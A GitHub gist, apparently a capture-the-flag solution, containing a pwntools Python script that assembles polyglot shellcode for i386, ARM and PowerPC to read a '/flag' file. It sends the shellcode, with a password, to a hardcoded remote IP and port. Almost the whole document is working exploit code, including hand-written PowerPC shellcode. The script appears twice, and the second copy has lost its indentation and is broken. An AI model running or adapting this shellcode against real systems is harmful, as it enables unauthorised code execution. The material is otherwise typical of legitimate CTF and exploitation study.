TethysSvensson · May 19, 2014 00:01
diff --git a/gistfile1.py b/gistfile1.py
 #!/usr/bin/env python

 from pwn import *
 import time, sys
 context('linux')

 # Our polyglots to branch our for a single architecture

 # ARMEL:   b $ + 464
 # ARMEB:   andvc r0, r0, #234
 # i386:    jb $ + 0; add dl, ch
 # ppc:     andi r0,r16,234
 poly1 = unhex('720000ea')

 # i386:    pop edi, pop edi, jmp $ + 127
 # ppc:     rlwnm. r31,r26,r29,13,31
 # ARMEB:   svcpl 0x005feb7f
 poly2 = unhex('30f0eb7f')

 # ppc:     beq-    $ + 200
 # ARMEB:   orrmi   r0, r2, r8, asr #1
 poly3 = unhex('418200c8')

 # cat shellcode for various architecture
 i386  = asm('add esp, 0x400', shellcode.cat('/flag', arch = 'i386'), shellcode.infloop(arch = 'i386'))
 armel = asm('add sp, #0x400', shellcode.cat('/flag', arch = 'arm'), shellcode.infloop(arch = 'arm'))

 # This is an ugly hack
 armeb = armel
 armeb = ''.join(s[::-1] for s in group(4, armeb))
 armeb = armeb.replace('alf/\x00\x00\x00g', '/flag\x00\x00\x00')

 # No ppc shellcode in pwntools :(
 ppc = asm('''
    b       end

 start:
    mflr    3
    li      0, 5
    li      4, 0
    sc
    li      0, 3
    ori     4, 1, 0
    li      5, 255
    sc
    ori     5, 3, 0
    li      0, 4
    li      3, 1
    ori     4, 1, 0
    li      5, 255
    sc
 infloop: b infloop
 end:
    bl      start
    .asciz "/flag"
 ''', arch = 'powerpc')


 code = [None]*1450

 def insert(offset, s):
    s = ordlist(s)
    for n, c in enumerate(s, offset):
        if code[n] != None:
            die("Trying to insert at %d, but something is already there" % n)
        code[n] = c

 # LAYOUT:
 # 0000:0004    poly1 (forks armel to 0 + 464 == 464)
 # 0004:0008    poly2 (forks i386  to 4 + 127 == 131)
 # 0008:0012    poly3 (forks ppc   to 8 + 200 == 208)
 # 0012:0092    armeb (len 80)
 # 0137:0190    i386  (len 53)
 # 0208:0282    ppc   (len 74)
 # 0464:0544    armel (len 80)

 insert(   0, poly1)
 insert(   4, poly2)
 insert(   8, poly3)
 insert(  12, armeb)
 insert( 135, i386)
 insert( 208, ppc)
 insert( 464, armel)

 while code[-1] == None:
    code = code[:-1]
 code = unordlist([c if c else 0 for c in code])

 r = remote('54.72.223.108', 30000, timeout = None)
 r.sendlineafter('Password: ', 'w0rk_tHaT_tAlEnTeD_t0nGu3')
 r.sendlineafter('SP is 0x42000000.', code)

 while True:
    try:
        s = r.recvline()
    except:
        break
    if not s:
        break
    if s.strip():
        print s.strip()
	#!/usr/bin/env python

	from pwn import *
	import time, sys
	context('linux')

	# Our polyglots to branch our for a single architecture

	# ARMEL: b $ + 464
	# ARMEB: andvc r0, r0, #234
	# i386: jb $ + 0; add dl, ch
	# ppc: andi r0,r16,234
	poly1 = unhex('720000ea')

	# i386: pop edi, pop edi, jmp $ + 127
	# ppc: rlwnm. r31,r26,r29,13,31
	# ARMEB: svcpl 0x005feb7f
	poly2 = unhex('30f0eb7f')

	# ppc: beq- $ + 200
	# ARMEB: orrmi r0, r2, r8, asr #1
	poly3 = unhex('418200c8')

	# cat shellcode for various architecture
	i386 = asm('add esp, 0x400', shellcode.cat('/flag', arch = 'i386'), shellcode.infloop(arch = 'i386'))
	armel = asm('add sp, #0x400', shellcode.cat('/flag', arch = 'arm'), shellcode.infloop(arch = 'arm'))

	# This is an ugly hack
	armeb = armel
	armeb = ''.join(s[::-1] for s in group(4, armeb))
	armeb = armeb.replace('alf/\x00\x00\x00g', '/flag\x00\x00\x00')

	# No ppc shellcode in pwntools :(
	ppc = asm('''
	b end

	start:
	mflr 3
	li 0, 5
	li 4, 0
	sc
	li 0, 3
	ori 4, 1, 0
	li 5, 255
	sc
	ori 5, 3, 0
	li 0, 4
	li 3, 1
	ori 4, 1, 0
	li 5, 255
	sc
	infloop: b infloop
	end:
	bl start
	.asciz "/flag"
	''', arch = 'powerpc')


	code = [None]*1450

	def insert(offset, s):
	s = ordlist(s)
	for n, c in enumerate(s, offset):
	if code[n] != None:
	die("Trying to insert at %d, but something is already there" % n)
	code[n] = c

	# LAYOUT:
	# 0000:0004 poly1 (forks armel to 0 + 464 == 464)
	# 0004:0008 poly2 (forks i386 to 4 + 127 == 131)
	# 0008:0012 poly3 (forks ppc to 8 + 200 == 208)
	# 0012:0092 armeb (len 80)
	# 0137:0190 i386 (len 53)
	# 0208:0282 ppc (len 74)
	# 0464:0544 armel (len 80)

	insert( 0, poly1)
	insert( 4, poly2)
	insert( 8, poly3)
	insert( 12, armeb)
	insert( 135, i386)
	insert( 208, ppc)
	insert( 464, armel)

	while code[-1] == None:
	code = code[:-1]
	code = unordlist([c if c else 0 for c in code])

	r = remote('54.72.223.108', 30000, timeout = None)
	r.sendlineafter('Password: ', 'w0rk_tHaT_tAlEnTeD_t0nGu3')
	r.sendlineafter('SP is 0x42000000.', code)

	while True:
	try:
	s = r.recvline()
	except:
	break
	if not s:
	break
	if s.strip():
	print s.strip()